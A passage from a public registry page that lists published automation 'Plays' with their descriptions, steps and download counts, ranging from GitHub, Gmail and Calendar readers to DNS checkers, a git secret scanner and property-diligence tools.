THE PUBLIC PLAY REGISTRY

Real plays.
Open contracts.

Inspect what a Play reads, writes, and needs before you run it. Every artifact below comes from its published registry manifest.

ALL PUBLIC PUBLISHERS · MODIQO PINNED FIRST
PLAYOFFS FIELD KIT · 150 STARTING POINTS
Need a Play to build?

Browse research-backed ideas that connect APIs, browsers, and local commands.

EXPLORE 150 IDEAS →
START HEREmodiqo / 0.2.2

Hello

Is it down, or is it just you — for YOUR machine. Probes the AI harnesses you actually have installed (claude, codex, agy, pi, hermes, opencode), ranks them by session recency, checks version drift and provider status, reads live model prices from LiteLLM, checks common infra (AWS, Supabase, Cloudflare, GitHub with Actions, HuggingFace), and surfaces this week's npm/cargo/pip advisories. A parallel dependency DAG with provable step-to-step dataflow; every source degrades to a labeled unknown instead of failing the play; ends in one classified briefing with a glyph stage ledger. S0-clean, reads public data only, writes nothing, carries no keys, needs only python3.

ROTE PLAY · PUBLISHED CONTRACTmodiqo/[email protected]
@01Hf Status@02Advisories@03Aws Events@04Infra Status@05Model Pricing@06Sessions Rank@07Version Drift@08Probe Harnesses@09Provider Status
EXECUTION
ROTE
INPUTS
0 PARAMETERS
EFFECT
READ ONLY
TRUST
DIGEST VERIFIED
220 CURRENT-VERSION DOWNLOADSPUBLISHED AUG 17, 2026
MOST DOWNLOADED · CURRENT VERSIONS

Proven paths, ready to inspect.

LIFETIME DOWNLOADS · NOT A TREND
01 · MODIQO / Engineering TOPICV0.1.4

List Top Committers

Lists top contributors for a GitHub repository, ranked by contribution count, with contribution share and profile URL.

@01Auth Github@02Contributors
2 STEPS3 INPUTSREAD ONLY167 DOWNLOADS
APISESSIONSGITHUB
CLICK ANYWHERE TO OPEN ↗
02 · MODIQO / Engineering TOPICV0.1.2

Search Github Repositories

Searches GitHub repositories by keyword and optional language, returning ranked repository details and aggregate result counts.

@01Auth Github@02Search One Language@03Search All Languages
3 STEPS4 INPUTSREAD ONLY147 DOWNLOADS
APISESSIONSGITHUB
CLICK ANYWHERE TO OPEN ↗
03 · MODIQO / Workplace TOPICV0.1.7

Retrieve Recent Emails

Retrieves recent Gmail messages matching a Gmail search query and returns normalized sender, subject, date, and snippet details.

@01Details@02Messages@03Google Auth@04Validate Inputs
4 STEPS2 INPUTSREAD ONLY131 DOWNLOADS
APISESSIONSGMAIL
CLICK ANYWHERE TO OPEN ↗
04 · MODIQO / Workplace TOPICV0.1.8

Retrieve Rideshare Receipts

Finds Uber, Lyft, and Waymo receipt emails in a date range, extracts trip and fare details, deduplicates updates, and totals spend.

@01Details@02Messages@03Google Auth@04Validate Inputs
4 STEPS3 INPUTSREAD ONLY116 DOWNLOADS
APISESSIONSGMAIL
CLICK ANYWHERE TO OPEN ↗
05 · MODIQO / Workplace TOPICV0.1.6

Check Calendar Meetings

Lists Google Calendar events between two timestamps with timing, attendees, location, organizer, and meeting links.

@01Events@02Auth Calendar@03Normalize End@04Normalize Start@05Validate Inputs
5 STEPS4 INPUTSREAD ONLY114 DOWNLOADS
APISESSIONSCALENDAR
CLICK ANYWHERE TO OPEN ↗
06 · MODIQO / Engineering TOPICV0.1.1

My Open Prs Review Status

Lists open pull requests by one GitHub user with review status and reviewer comment counts.

@01Reviews@02Auth Github@03Current User@04Search Query@05Selected Prs+3
8 STEPS4 INPUTSREAD ONLY72 DOWNLOADS
APISESSIONSGITHUB
CLICK ANYWHERE TO OPEN ↗
THE PUBLIC INDEX

Every published Play.

681 MANIFESTS · PUBLIC
FILTER INDEX
#PLAYREACHPATHEFFECTDOWNLOADS
01HelloIs it down, or is it just you — for YOUR machine. Probes the AI harnesses you actually have installed (claude, codex, agy, pi, hermes, opencode), ranks them by session recency, checks version drift and provider status, reads live model prices from LiteLLM, checks common infra (AWS, Supabase, Cloudflare, GitHub with Actions, HuggingFace), and surfaces this week's npm/cargo/pip advisories. A parallel dependency DAG with provable step-to-step dataflow; every source degrades to a labeled unknown instead of failing the play; ends in one classified briefing with a glyph stage ledger. S0-clean, reads public data only, writes nothing, carries no keys, needs only python3.ROTE9 STEPSREAD ONLY220 ↓02List Top CommittersLists top contributors for a GitHub repository, ranked by contribution count, with contribution share and profile URL.APISESSIONSGITHUB2 STEPSREAD ONLY167 ↓03Search Github RepositoriesSearches GitHub repositories by keyword and optional language, returning ranked repository details and aggregate result counts.APISESSIONSGITHUB3 STEPSREAD ONLY147 ↓04Retrieve Recent EmailsRetrieves recent Gmail messages matching a Gmail search query and returns normalized sender, subject, date, and snippet details.APISESSIONSGMAIL4 STEPSREAD ONLY131 ↓05Retrieve Rideshare ReceiptsFinds Uber, Lyft, and Waymo receipt emails in a date range, extracts trip and fare details, deduplicates updates, and totals spend.APISESSIONSGMAIL4 STEPSREAD ONLY116 ↓06Check Calendar MeetingsLists Google Calendar events between two timestamps with timing, attendees, location, organizer, and meeting links.APISESSIONSCALENDAR5 STEPSREAD ONLY114 ↓07My Open Prs Review StatusLists open pull requests by one GitHub user with review status and reviewer comment counts.APISESSIONSGITHUB8 STEPSREAD ONLY72 ↓08Recent Github IssuesFetches the most recently created issues for a GitHub repository, excluding pull requests.APISESSIONSGITHUB2 STEPSREAD ONLY58 ↓09Github Recent Issues Install Uri SmokeLists recent issues for a GitHub repository and verifies the published install command.APISESSIONSGITHUB2 STEPSREAD ONLY53 ↓10List Linear IssuesLists Linear issues with an optional workflow-state shortcut or a raw GraphQL IssueFilter JSON object.APISESSIONSLINEAR4 STEPSREAD ONLY45 ↓11Github Authored Issues ReportLists up to 1,000 issues authored by a GitHub user and verifies completeness against GitHub's search total.APISESSIONSGITHUB6 STEPSREAD ONLY45 ↓12List Git Worktrees With Pr StatusList a local repo's git worktrees with source size (excluding target/node_modules/.git build & dependency dirs so it fits the per-step time budget), dirty/clean status, and the linked GitHub PR for each (branch match for attached worktrees, head-sha match for detached), scanning the most-recently-updated PRs.APISESSIONSGITHUB3 STEPSREAD ONLY44 ↓13Fetch Stripe Payables ReceivablesFetches Stripe charges and payouts for a calendar-date range with transaction details and currency totals.APISESSIONSSTRIPE5 STEPSREAD ONLY40 ↓14Summarize Stacked Github PrsBuilds the complete GitHub pull-request stack rooted at a bottom PR, explains every PR from the user's point of view, and renders the branch relationships as Mermaid.APISESSIONSGITHUB3 STEPSREAD ONLY36 ↓15Elevenlabs Tts MemoSynthesizes text with an ElevenLabs voice and saves the returned audio to a local file.APISESSIONSELEVENLABS3 STEPSREAD ONLY32 ↓16Dns Propagation CheckCompares authoritative DNS answers with Cloudflare, Google, and Quad9 in parallel, then explains whether a record is consistent, still propagating, misconfigured, divergent, or indeterminate. Authoritative discovery and each public resolver are independent DAG steps, so probes run concurrently, degrade to labeled unknowns instead of failing the play, and the verdict join shows exactly which source said what.ROTE6 STEPSREAD ONLY29 ↓17Play DagParses the rote frontmatter of any play and draws its step DAG in three formats at once — an ASCII layer view for the terminal, Mermaid for anything that renders markdown, and a canonical JSON graph for machines. All three are rendered from one canonical semantic model under a representation-parity contract — ordering edges, value edges with exact jq paths, and for_each fan-out (selector, source, max_concurrency) appear in every complete view, and the only lossy view (the one-line summary) declares itself lossy. Accepts a local path, an owner/name reference, or a canonical https play URI; for URIs it verifies the signed-in identity, checks access, and pulls the play before parsing. Distinguishes ordering edges (depends_on) from value edges (@step refs with exact jq paths) and computes the parallel execution layers the runner will use. Its own four-step DAG demonstrates every edge kind it visualizes.ROTE4 STEPSREAD ONLY24 ↓18Cloudflare List ResourcesLists Cloudflare registered domains, Workers scripts, and Pages projects for a supplied or automatically discovered account.APISESSIONSCLOUDFLARE8 STEPSREAD ONLY21 ↓19Cloudflare Worker DetailsLists Cloudflare Workers with settings, bindings, routes, and optional deployment history for an account or one script.APISESSIONSCLOUDFLARE6 STEPSREAD ONLY20 ↓20Whale Flow MonitorMonitor whale accumulation on Polymarket. Combines the public Gamma API (market metadata, pricing) with the public Data API (holders, leaderboard) to identify markets where top-performing traders are building positions, flagging whale clustering and smart-money flow signals. Migrated to the steps DAG form: market discovery and the trader leaderboard fetch run in parallel as independent roots, per-market holder fetches fan out from discovery, and the correlation join cross-references holders against the leaderboard — each source degrades to a labeled unknown instead of failing the play.ROTE4 STEPSREAD ONLY19 ↓21Package Name SearchChecks candidate package names across npm, PyPI, and crates.io in parallel, then ranks names by likely availability without claiming publish guarantees. Each registry is its own DAG step, so probes run concurrently, an unreachable registry degrades to labeled indeterminate rows instead of failing the play, and the ranking join shows exactly which registry said what.ROTE5 STEPSREAD ONLY15 ↓22Registry Play InventoryLists every public Play owned by organizations visible to the current authenticated Rote profile, ranked by current-version lifetime downloads and grouped by organization.ROTE2 STEPSREAD ONLY14 ↓23Process Only Play Run VerificationRuns a portable local printf process and returns its captured stdout, proving process-only registry plays execute through rote play run.ROTE1 STEPSREAD ONLY14 ↓24Hacker News Browser Top StoriesBrowse the public Hacker News front page in an isolated headless browser and return the top story links.BROWSERSHELL3 STEPSREAD ONLY14 ↓25Website Launch ReadinessChecks a public website launch across DNS, HTTP, TLS, security headers, essential metadata, robots, sitemap, and optional local Lighthouse scores. Each probe family is its own DAG step in a four-layer graph, so DNS and the page fetch run in parallel, TLS/robots/sitemap/Lighthouse fan out from the fetched final origin, any single probe degrades to a labeled unknown instead of failing the play, and the readiness join shows exactly which probe said what.ROTE8 STEPSREAD ONLY13 ↓26Dependency Vulnerability CheckRecursively discovers common dependency lockfiles, checks pinned package versions against OSV per ecosystem, and returns deterministic findings with fix versions and novice-friendly guidance. Discovery, the six per-ecosystem OSV queries, detail enrichment, and the report join are separate DAG steps, so ecosystem queries run in parallel, empty ecosystems skip with a label, failed detail lookups degrade to labeled minimal findings, and an interrupted run resumes at the failed stage without re-parsing lockfiles.ROTE10 STEPSREAD ONLY12 ↓27Provider Outage TriageCorrelates direct DNS, TLS, and HTTP checks with official provider status feeds to classify whether a failure is likely in the application, network, DNS, TLS, or an upstream provider. The direct checks form a dependency chain (TLS needs DNS, HTTP needs both) while the status feeds probe in parallel, every source degrades to a labeled unknown instead of failing the play, and the correlation join shows exactly which observation drove the classification.ROTE6 STEPSREAD ONLY11 ↓28Weather Updates For CitiesReports current temperatures for a single editable station list, includes wind for the reference station, emits a threshold alert, verifies a live page headline, and captures Python toolchain provenance.APIBROWSERSHELLSESSIONSOPEN-METEO8 STEPSREAD ONLY10 ↓29Second OpinionCross-examines one AI coding assistant's answer with a different assistant. Asks the first for a conclusion plus reasoning, gives the second the original question, the same material and the first answer, and asks whether it holds up and which single claim it would challenge first. Leads with the disagreement, then the verdict, then both reasonings. Refuses to run both roles as the same assistant.ROTE4 STEPSREAD ONLY9 ↓30Email Domain ReadinessChecks an email domain for MX, SPF, DMARC, optional DKIM, MTA-STS, TLS-RPT, CAA, and DNSSEC readiness without claiming inbox placement. Every record family is its own DAG step, so the eight probes run in parallel, any single lookup degrades to a labeled indeterminate instead of failing the play, and the readiness join shows exactly which record said what.ROTE10 STEPSREAD ONLY9 ↓31Agent Work Daily CloseAudits recent Codex, Claude Code, and Pi sessions for redacted credential exposure, normalized tool use, cross-session lineage, Git closure, and token-to-outcome attribution.ROTE5 STEPSREAD ONLY9 ↓32Domain Provider SearchChecks domain registration evidence with authoritative RDAP and DNS, then ranks registrar providers with a transparent feature matrix. No provider login or API key is required.ROTE1 STEPSREAD ONLY8 ↓33Startup Equity HealthComputes startup equity-health metrics for a private company and explains them for a prospective employee: capital efficiency (total raised / ARR), valuation multiple (valuation / ARR), liquidation preference stack share (raised / valuation), an acquisition payout waterfall across exit prices, post-lockup IPO scenarios, and an after-tax take-home (earn-out) estimate reflecting vesting cliff, 409A strike cost, and blended federal+state taxes — ending with the questions an employee should ask the employer. Each computation stage is its own DAG step with explicit value edges (the derived metrics flow from core_metrics into the waterfall, IPO, and take-home stages), so every intermediate number is inspectable per step. The invoking agent elicits the financial inputs from public web coverage before calling, and passes provenance via the sources parameter.ROTE6 STEPSREAD ONLY7 ↓34Search NotionSearch Notion workspace pages for a topic and summarize the most relevant hits.APISESSIONSNOTION-MCP2 STEPSREAD ONLY7 ↓35Friction Free City Micro AdventureBuilds a realistic low-friction micro-itinerary for a city from available time, budget, mobility, weather tolerance and interests. Resolves the city, reads live forecast and air quality, ranks candidate venues by geodesic travel feasibility, verifies venue pages in a browser, and reports a scheduled plan with budget totals.APIBROWSERSHELLSESSIONSOPEN-METEOOPEN-METEO-AIR-QUALITYOPEN-METEO-ELEVATIONOPEN-METEO-GEOCODING18 STEPSREAD ONLY6 ↓36Property Public Record Quick ScanBuilds a provenance-preserving public-record evidence pack for a Texas or Miami property from one address, then identifies early acquisition risks and evidence gaps.ROTE1 STEPSREAD ONLY4 ↓37Evaluate Agentic Web SearchEvaluates final agent answers across isolated web-search arms with strict pilot and publication gates, traceable grading, human audits, confidence intervals, statistical ties, and Pareto reports.ROTE14 STEPSREAD ONLY3 ↓38Seller Narrative Cross ExaminerCross-examines seller and listing claims against independently sourced property, association, permit, insurance, legal, and market evidence; labels each claim supported, mixed, unsupported, or unverified and converts gaps into document requests and offer protections.ROTE2 STEPSREAD ONLY3 ↓39Condo Buyer DiligenceEducates a prospective U.S. condo buyer from an address or area, purchase price, and intention. Runs public-source location and market checks in parallel, calculates mortgage and ownership scenarios, labels evidence quality, and returns a novice-readable report plus JSON.ROTE8 STEPSREAD ONLY3 ↓40Offer Strategy Decision RoomSynthesizes exit liquidity, assessment exposure, seller-claim reliability, adjusted comparables, and micro-market scenarios from one provenance-preserving evidence pack into a bid ceiling, contingency package, evidence requests, and explicit walk triggers.ROTE2 STEPSREAD ONLY2 ↓41Micro Market Future State SimulatorSimulates bear, base, and bull micro-market states from supply pipeline, absorption, insurance and tax pressure, employment, climate exposure, and local planning evidence to identify the variables that can break an acquisition thesis.ROTE2 STEPSREAD ONLY2 ↓42Exit Liquidity Buyer Pool CompressorMeasures how financing, warrantability, inventory, days-on-market, and sale-to-list evidence compress the future buyer pool for a Texas or Miami property; returns a resale-liquidity tier, pricing haircut range, contingencies, and walk triggers.ROTE2 STEPSREAD ONLY2 ↓43Comparable Sale Reality AdjusterRe-underwrites comparable sales for recency, distance, condition, floor or view, HOA burden, distress, and financing quality to produce an evidence-weighted value range and offer adjustment for Texas and Miami properties.ROTE2 STEPSREAD ONLY2 ↓44Assessment Bomb ForecasterForecasts low, base, and high per-unit special-assessment exposure from reserves, known projects, deductibles, insurance trends, and structural or milestone obligations for Texas and Miami acquisitions.ROTE2 STEPSREAD ONLY2 ↓45Ci Self HealerAutonomous universal CI/CD failure diagnoser and self-healing repair engine. Scans host runner environments across Node.js (React & Express), Python (unittest & pytest), Go (go test), Ruby (minitest & Rails), Cargo, and Make. Captures stack traces, parses error context, and synthesizes line-level code patches using LLMs (Google Gemini 3.7 Flash, OpenAI, Claude, DeepSeek, Ollama, or any OpenAI-compatible API). Executes deterministic multi-stage verification (lint, build, test), displays Recovery SLA timing metrics, and supports direct, branch, PR, or dry-run delivery strategies. Integrated natively with keyless MCP and AI IDE Agent Skills.ROTE4 STEPSREAD ONLY49 ↓46HeadhunterEvery job scored with the evidence quoted back at you, a status column that is never overwritten, and a first run that works with zero setup. Headhunter sweeps HN Who's Hiring, YC companies hiring on HN, the SimplifyJobs intern and new-grad lists, and vanshb03's Summer2027 internships fork daily, scores every listing against your CV or an agent-built weighted profile, and merges into a living CSV plus an .xlsx twin (new rows highlighted, built stdlib-only). Finds the newest thread itself; vanished listings are marked stale, never deleted; salary reported only when the listing states it; junior profiles never drown in senior-only roles. Columns include india-location and visa-sponsorship flags. Three-stage design: your agent builds a weighted profile once (resources/profile-prompt.md), the play hunts deterministically, your agent re-ranks over the companion handoff file (resources/rerank-prompt.md). If an optional source is down the run degrades to a warning, never a dead run. Writes the CSV at csv_path, the xlsx twin, a .handoff.json beside the CSV, and ~/.headhunter.json which remembers your cv_path so bare reruns stay personal. A first run with no CV is clearly labelled a demo run and writes to -demo files instead, so the sheet you keep real applications in stays untouched until you point it at a real CV. Warns when a profile is older than 30 days. No adapters, no credentials, no keys; needs only curl and python3.ROTE8 STEPSREAD ONLY49 ↓47Tech DebtFinds five classes of technical debt in one local Git repository or every immediate child repository of a parent directory, attributes each line with Git blame, computes UTC age, and reports per-repository tables sorted oldest first plus a hotspot view that says who owns the debt, which directories concentrate it, and how old it is. Classes are TODO/FIXME/HACK marker comments, linter and type-checker suppressions (eslint-disable, @ts-ignore, noqa, type ignore, pylint disable, pragma no cover, nosec, nolint, rubocop disable, SuppressWarnings, pragma warning disable, Rust allow, NOSONAR and more), skipped or expected-failure tests (pytest skip/xfail, unittest skip, it.skip/xdescribe/test.todo, t.Skip, JUnit Disabled/Ignore, .NET Skip, RSpec xit, Rust ignore, PHPUnit markTestSkipped) matched only inside test files, debug leftovers (debugger statement, console.trace, pdb/ipdb set_trace, breakpoint(), Ruby binding.pry/byebug, PHP var_dump/dd) matched everywhere, and swallowed exceptions (a bare except that only passes, an empty catch block, Ruby rescue nil or an empty rescue, Go's blank underscore assignment on an error, a one-line empty promise catch) where the handler discards the error with no log, re-raise or real handling. The hotspot view ranks blame authors and second-level directories by debt count across every repository and class (top_n rows each) and buckets every item by age (under 90 days, 90 days to 1 year, 1 to 2 years, over 2 years, unknown). With since_ref set to a tag, branch or commit, every class is also scanned at that ref (git cat-file, no checkout) and the report shows the delta of debt added, removed and persisting since then, matched on file, rule and text so line shifts do not count. Discovers the repositories first, then scans each one in five parallel fan-out steps (one per class, each switchable) with start/end integrity checks, then re-discovers the collection to prove nothing changed while scanning. Probes the environment and verifies its fail-closed input contract plus exact per-class detection counts and directory rollups against a bundled example on every run.ROTE9 STEPSREAD ONLY42 ↓48Audit PlayAfter a few months of clicking yes, always, your Claude Code or Codex allow list is a list nobody has read. This tells you which entries you can delete. It reads your settings files and MCP servers for what you granted, reads your session transcripts for what actually ran, and subtracts one from the other. You get four lists: grants nothing ever used, the write-capable ones among them, rules that can reach past this machine, and MCP servers that sat idle the whole window. Each row names the file it came from, so you can trim the list yourself. Your settings files are only ever read from, a grant stays granted, and no socket is opened; the only thing it puts on disk is its own report, six files in an output directory you choose, and the only thing it needs is python3.ROTE6 STEPSREAD ONLY37 ↓49First IssueFinding an issue labelled "good first issue" is easy; GitHub search does it. Knowing which ones are not traps is the hard part, and that is what this scores. Every candidate is filtered at the search index for unassigned, no linked pull request, live repository, and a short comment thread, then ranked against your own weighted skill profile with the matching evidence quoted on each row. The repositories behind your top matches are checked for real activity, so an issue in an abandoned or archived project is flagged rather than recommended, and the top picks are spread across projects so one prolific repo cannot fill your whole list. Red flags are shown, never scored away: a busy thread that may already be claimed, a stale issue freshly bumped, a reporter who is not a maintainer, an issue too thin to start without asking. Honest limit: it does not read comment threads, because that costs one API call per issue and would break the keyless budget, so an issue with a couple of comments may still be quietly taken; the companion re-rank prompt has your agent confirm the top few. Reads the public GitHub API with plain GETs and writes exactly two files: it creates and merges the CSV at csv_path, where your status column is never overwritten and issues that disappear are marked stale rather than deleted, and it writes a .handoff.json beside that CSV for the final agent pass. It changes nothing on GitHub and never comments, claims or opens anything. Runs cold with a bundled demo profile. No adapters, no credentials, no keys; needs only curl and python3.ROTE4 STEPSREAD ONLY37 ↓50Sweep Git ReposYou have a folder full of repos and no idea which ones hold work that only exists on your laptop. This finds them. It walks every git repo under a folder you choose and reports unpushed commits, uncommitted changes, stashes and branches with no upstream, then asks GitHub whether that work is already on origin or in a pull request. That leg uses your existing gh login or the rote github adapter, makes GET calls only, and can be switched off. A repo it cannot read is listed as unknown, not dropped. The only file it writes is a baseline kept outside your repositories, so the next sweep shows what moved. It never writes inside a repository and never fetches.APIGITHUB7 STEPSREAD ONLY34 ↓51Reach CheckSee what a Play actually reaches on this machine before you publish it or run it. rote play inspect shows what a Play declares and resolves those declarations against your host. This reads the step bodies themselves, follows sh -c, python3 -c and @resource files, and reports the executables, imports, adapters, browser steps, environment variables and writes they really touch, together with which of them are missing here. It also flags argv paths that point at a user home directory or do not resolve here, which is how a published Play ends up running only on its author's machine. It never runs, imports or pulls the Play it reads, and it writes nothing. The one subprocess it runs is rote play inspect, to report rote's own verdict beside this one, and offline=true skips it. It runs its own positive and negative cases before the scan, on your machine, against the same reader the scan uses, and refuses to call the scan trustworthy if any of them fail. The negative half is the one that matters, because the cheap way to pass a test for under-reporting is to report every token in a body as a command.ROTE4 STEPSREAD ONLY33 ↓52Women Safety Sos AlertAutonomous high-priority women safety SOS beacon and emergency incident dispatcher. Automatically resolves the user live network geolocation fix and broadcasts actionable distress cards with direct Google Maps navigation links and 112/1091/181 helpline lifelines via Telegram. ROTE1 STEPSREAD ONLY28 ↓53Git History Secret ScanFinds credentials that remain reachable in local git history, not just the working tree. Deleting a .env and committing does not remove its earlier reachable blob, and a hackathon repo is usually made public at submission time. Three independent stages run as parallel DAG steps (text-blob scanning across every local ref, env filenames in reachable commits, and whether a configured GitHub repository is actually public, asked of your own gh session rather than inferred from the host), then one join weighs each finding against that exposure. A stage that cannot complete becomes a labeled indeterminate rather than a silent pass, and every report states how many objects it actually walked, because a partial scan and a clean repository must not read the same. Read-only: never rewrites history or mutates the repository. The optional visibility lookup shells out to your existing gh login; when gh is missing, logged out, or bounded lookup coverage is incomplete, the report says visibility was not resolved rather than guessing.ROTE5 STEPSREAD ONLY25 ↓54Hackathon Submission ReadinessAudits a repository the way a hackathon judge reads it: cold, on a deadline, unwilling to debug someone else's setup. Six probe families run as parallel DAG steps (README cold-open, credentials, secret shapes, repo hygiene, TODO density, demo-path fragility), any single probe degrades to a labeled indeterminate instead of failing the play, and the readiness join reports blockers, risks and what it deliberately did not check. The cold-open probe resolves fenced npm, pnpm, Yarn and Make tasks against the nearest applicable project manifest, catching the paste that dies on a judge's first try, and the credentials probe separates environment variables read with a fallback from those read without one, because only the second kind stops a run on a machine that has none of them set. Read-only: never writes to the audited repo, never runs its build, carries no credentials, needs only python3 and git.ROTE8 STEPSREAD ONLY25 ↓55Playoffs StandingsLive standings for the Modiqo public Play registry: total plays and owners, top-N by lifetime downloads, everything published in the last H hours, and per-owner aggregates. Every run also compares itself against your last run and shows what changed since then -- plays that newly appeared (with age), the biggest download gainers, and any references that vanished; the first run just saves a baseline. Set author to track one publisher's own plays with rank, downloads, and delta. Fetches the live endpoint with retry and falls back to the cached feed with a labeled warning instead of failing (urllib chokes on this CDN's chunked responses; the proven path is curl --compressed). Read-only against the registry; saves only a small snapshot under its own run workspace so the next run can show you what changed. Plays are tracked by owner/name across version bumps: a bump shows as UPDATED, never as one play GONE plus one NEW, and the saved baseline keeps each play's high-water download count so the registry's ~10-minute feed cache can never fake a gain. No credentials, no browser; needs only python3 and curl.ROTE2 STEPSREAD ONLY25 ↓56Meeting PrepReads your Gmail and Calendar before a meeting and writes one page per meeting: the sentences you wrote that read like commitments, the ones they wrote that read like asks, and which asks you never replied to, each traced to a message id. Silence is provable; whether a reply answered is not, so it claims only what it shows. Connect GitHub, Linear or ClickUp and a commitment still open in mail can carry the merged pull request or completed task that suggests you did it, scoped to your own work and labelled a wording match. It writes the pages and their JSON, opens the first, and deletes only its own stale session folders.APICALENDARGITHUBGMAILLINEAR12 STEPSREAD ONLY24 ↓57Ship RecapIt is 8pm, you shipped all day, and you have posted nothing. This reads your git commits and your Claude Code or Codex transcripts from that day and writes one HTML page you open. Each topic gets an X draft and a LinkedIn draft, shown as they will look in the feed, with a copy button and an illustration of that work. Every number and path in a draft has to appear in the evidence or the draft is sent back for one rewrite. Names you list in redact_terms are cut out as the day is read, and a page still carrying one is refused. It never posts, and with writer=none it makes no model call.ROTE9 STEPSREAD ONLY24 ↓58Hackathon RadarWhat opens, what closes tonight, and what changed since yesterday - one digest, zero setup. Sweeps Devpost, Devfolio, Unstop and MLH every morning, sorts strictly by soonest deadline, and puts a countdown on every row. Prizes and dates appear only when the source states them: a listing with no cash pool says how many non-cash prizes it has instead of claiming zero, and nothing is converted between currencies. Remembers what it showed you, so later runs mark what is genuinely new instead of repeating yesterday. The same event cross-listed on two platforms collapses into one row that says where else it appears. Every source reports its own health in a footer, and a source that is down costs you that source, never the run. Writes a markdown digest at out_path and its memory at state_path; optional place filter narrows to a city or country. No adapters, no credentials, no keys; needs only curl and python3.ROTE5 STEPSREAD ONLY24 ↓59Ci Test HealerAutonomous Universal Cloud LLM CI/CD Failure Diagnoser & Self-Healing Repair Play for Node.js, Go, Python, Rust, and MakeROTE4 STEPSREAD ONLY22 ↓60Token TabYour coding sessions already wrote down every token they used, split four ways across model tiers at different prices, with subagent spend buried in subdirectories. It is unreadable by hand, so nobody reads it. This reads it. You get a table of tokens and list-price equivalent per model, your heaviest sessions with subagent cost broken out, and exactly four waste checks: the same file re-read within one session, a near-zero cache-read rate that means something near the front of your prompt keeps changing and the whole prefix is being re-billed, a subagent that cost real money to make two tool calls, and a run of mechanical edits on a top-tier model. Every finding names its evidence and what to change. Two promises it keeps: the money figure is API list-price equivalent and the report says plainly that it is not a bill, because on a subscription it is not what you paid; and prices come from a bundled table that carries its source URL and an as-of date, so a model missing from it is reported as tokens with the cost left blank rather than guessed. It reads counts, costs and file paths, never prompt text, file contents or tool results. It writes a markdown report at out_path and a claude-md.proposed.diff beside it which it never applies - suggested rules are yours to paste in or ignore. Zero network, so it cannot break when a website changes. Runs cold on bundled demo logs. No adapters, no credentials, no keys; needs only python3.ROTE2 STEPSREAD ONLY20 ↓61Settlement DelayYour Stripe payout landed days late and nobody can say why. It gives every waiting day one reason from weekends, Indian second and fourth Saturday closures, bank holidays, dispute holds, reserves, batch cutoffs and posting lag, each naming the evidence behind it, with ids where they exist, and reporting a day nothing accounts for as unexplained. It reads Stripe, Plaid rather than Mercury, Xero and bundled calendars rather than a Google Calendar over plain HTTPS, declaring no adapter so a stranger can run it cold. Your accounts are only ever read from; it writes one JSON file per leg, the attribution and a markdown report.ROTE7 STEPSREAD ONLY20 ↓62Floor CheckSee the lowest Python version your code will actually run on, before someone on an older interpreter finds out for you. Syntax checks and linters read code that parses; they say nothing about code that parses and then raises. A union annotation like "int | None" compiles on 3.9 and throws TypeError the moment the module is imported, and "import tomllib" compiles and then fails to find the module. This reads the source with ast, finds both classes, and compares what the code needs against what the project declares in pyproject.toml, setup.cfg or deps.toml. It never imports, executes or pulls anything it reads, it writes nothing, and it runs no subprocess at all. It runs its own positive and negative cases before the scan, on your machine, against the same reader the scan uses, and refuses to call the scan trustworthy if any of them fail. Reporting too much is the failure that matters here, because a false needs-3.11 sends an author chasing a portability bug that does not exist, so every category carries cases that must stay quiet as well as cases that must fire.ROTE3 STEPSREAD ONLY18 ↓63PolygraphYour agent says it fetched the data. This checks whether it did, scoring what it CLAIMED against what OSV, World Bank and USGS actually returned. On the run this was built from, a bluffing claim set failed 4 of 5 checks while still passing the one figure that happened to be true - it scores per claim, not per agent. Four checks: call reality, pagination exhaustion (claiming complete after 1 of 6 World Bank pages reaches 50 of 265 rows), citation retention, and error surfacing (a deliberately malformed query returns HTTP 400 - reported, or swallowed?). Five steps: four independent source reads in parallel, one join. A source that goes down degrades to a labeled unknown and the run still completes; an indeterminate check is never a pass. Read-only against every source: anonymous public reads, no credential, nothing written back. Its only local effect is writing polygraph.html into out_dir, creating that directory if it does not exist; out_dir defaults to the run workspace. Needs only python3 3.9 or newer.APISESSIONSOSV6 STEPSREAD ONLY18 ↓64Play Quality DoctorDiagnoses why a play scores what it does on the registry quality rubric, then derives only the frontmatter it can support from the target's files. Validation resolves one entrypoint, validates its frontmatter name, and creates a bounded, symlink-safe fingerprint of main.ts, deps.toml presence/content, and every presentation-fixture file. The parallel scorer and source reader both verify that complete package fingerprint before and after their work so one diagnosis cannot mix revisions. Result calls inside comments and strings are ignored; divergent result shapes and ambiguous JavaScript expressions are left underivable instead of guessed. Only exact supported no-write declarations such as `writes: None` are treated as read-only. Suggested fixes report their potential rubric weight, but no future score is claimed until the caller applies them and re-runs the authoritative scorer. Read-only: never edits or executes the target play, needs no credentials, and makes no network call.ROTE4 STEPSREAD ONLY17 ↓65Flake FinderWhich of your CI jobs fail at random? `gh run list` cannot tell you, and not for want of a flag: it prints one line per run carrying a run-level conclusion, so a red run on a 134-job matrix names none of the 134, and nothing groups a job across the runs it appeared in. Flakiness is only visible on both axes at once, per job and across history. This play samples recent completed runs on the default branch, where the code is presumably good, and groups every conclusion by job name. A job that both passed and failed there is flaky, reported with its rate and counts; one that only ever failed is broken, listed separately. Cancelled and skipped runs are counted but never scored as failures, because a busy branch cancels superseded runs constantly and counting those would manufacture flakes that do not exist. A single failure with no passing run is called unconfirmed, and a run holding more jobs than one page returns calls itself a lower bound. Read-only, no API key beyond the gh CLI you have.ROTE4 STEPSREAD ONLY16 ↓66Git Handoff SnapshotCreates a compact Git handoff with branch, last-fetched upstream state, changed paths, numeric diff totals, stash count, and recent commit metadata without outputting file contents or patch hunks.ROTE7 STEPSREAD ONLY16 ↓67Review GateDecides whether a pull request is safe to merge, and says exactly what is blocking it. `gh pr view` and every check built on GitHub REST v3 share one blind spot: review-thread resolution (`isResolved`) exists only in the GraphQL API, so a pull request carrying unresolved blocking feedback reports as ready. On grafana/grafana#131909 that gap hid a High-severity finding, an unclamped `toFixed` that throws, behind zero failing checks and no merge conflicts. This play reads threads through GraphQL and checks through `gh pr view`, naming each unresolved thread with file, line, author and permalink. It degrades honestly, never optimistically: pending checks never count toward a pass, uncomputed mergeability is reported as unknown, over 100 threads makes the count a lower bound, and a pull request nobody has reviewed is reported as unreviewed rather than as safe. The verdict can fall to cannot-confirm, but never to safe. Read-only, no API key beyond gh, and cheap enough to run before every merge.ROTE3 STEPSREAD ONLY15 ↓68Reviewer FinderAssigning a reviewer is a guess unless you know who has touched the code. GitHub will not tell you: a pull request lists who was requested, never whether they edited these files, and CODEOWNERS answers a different question: who owns a path by policy, not who still has context. The obvious substitute, ranking by commit count on the changed files, is worse than nothing: on a recent kubernetes pull request the top 